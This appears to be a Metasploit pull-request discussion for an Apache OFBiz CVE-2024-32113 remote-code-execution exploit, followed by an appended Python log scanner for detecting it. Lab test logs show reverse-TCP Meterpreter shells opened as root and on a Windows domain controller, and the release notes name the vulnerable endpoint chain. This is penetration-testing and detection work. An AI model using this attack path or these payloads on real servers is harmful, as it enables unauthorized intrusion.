Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249
@msjenkins-r7 retest this please
I tested this out on both a Windows and Linux target. I used multiple payloads for Windows to confirm the issue I had originally was no longer present. At this time, everything looks good to me and appears to be working as intended.
I'll go ahead and get this landed.
Linux Testing Output
```
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:42422) at 2024-06-17 10:56:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.250.134
OS           : Debian 11.4 (Linux 6.8.11-300.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/usr/src/apache-ofbiz
meterpreter >
```
Windows Testing Output
```
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > check
[+] 192.168.159.10:8443 - The target is vulnerable. Tested remote code execution successfully
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (201798 bytes) to 192.168.159.10
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:59322) at 2024-06-17 11:19:57 -0400
meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > pwd
C:\ofbiz
meterpreter > background
[*] Backgrounding session 4...
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (176198 bytes) to 192.168.159.10
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:59324) at 2024-06-17 11:20:37 -0400
meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter >
```
Release Notes

This adds an exploit for CVE-2024-32113, which is an unauthenticated RCE in Apache OFBiz. Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint `/webtools/control/forgotPassword` allows an attacker to access the `ProgramExport` endpoint, which in turn allows for remote code execution in the context of the user running the application. When exploiting on Windows, the module currently requires a PowerShell payload to be selected. This payload limitation is outlined in more detail in the documentation.
Verification Steps

- `use apache_ofbiz_forgot_password_directory_traversal`
- Set the `RHOST` and `LHOST` options
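As an added defender-side example (not part of this pull request or of the Metasploit module), the script below flags access-log requests that reach `ProgramExport` by way of the `forgotPassword` endpoint, after percent-decoding the path, and checks a reported OFBiz version against the 18.12.13 fix threshold stated above. The Common Log Format layout, the sample lines and the assumption that both endpoint names appear in one decoded request path are mine, not from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jun/2024:10:55:01 -0400] "GET /webtools/control/main HTTP/1.1" 200 5120
10.0.0.7 - - [17/Jun/2024:10:56:10 -0400] "POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1" 200 318
10.0.0.9 - - [17/Jun/2024:10:57:44 -0400] "POST /webtools/control/forgotPassword/%50rogram%45xport HTTP/1.1" 200 318
10.0.0.11 - - [17/Jun/2024:10:58:02 -0400] "GET /webtools/control/forgotPassword HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

FIXED_VERSION = (18, 12, 13)  # "versions prior to 18.12.13 are vulnerable"


def parse_version(text):
    return tuple(int(part) for part in text.split("."))


def is_affected_version(text):
    # Strictly older than the fixed release counts as affected.
    return parse_version(text) < FIXED_VERSION


def normalize_path(uri):
    path = uri.split("?", 1)[0]
    # Decode twice so double-encoded segments are compared in plain form,
    # then lowercase so mixed-case variants still match.
    return unquote(unquote(path)).lower()


def is_traversal_to_program_export(uri):
    # Assumption: the suspicious request names forgotPassword and then
    # ProgramExport later in the same decoded path.
    path = normalize_path(uri)
    start = path.find("forgotpassword")
    return start != -1 and "programexport" in path[start:]


def scan_log(text):
    """Return (ip, method, uri, status) for every matching request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_to_program_export(m["uri"]):
            hits.append((m["ip"], m["method"], m["uri"], m["status"]))
    return hits
```

A plain request to `forgotPassword` alone is legitimate traffic and is not flagged; only paths that continue on to `ProgramExport` are reported.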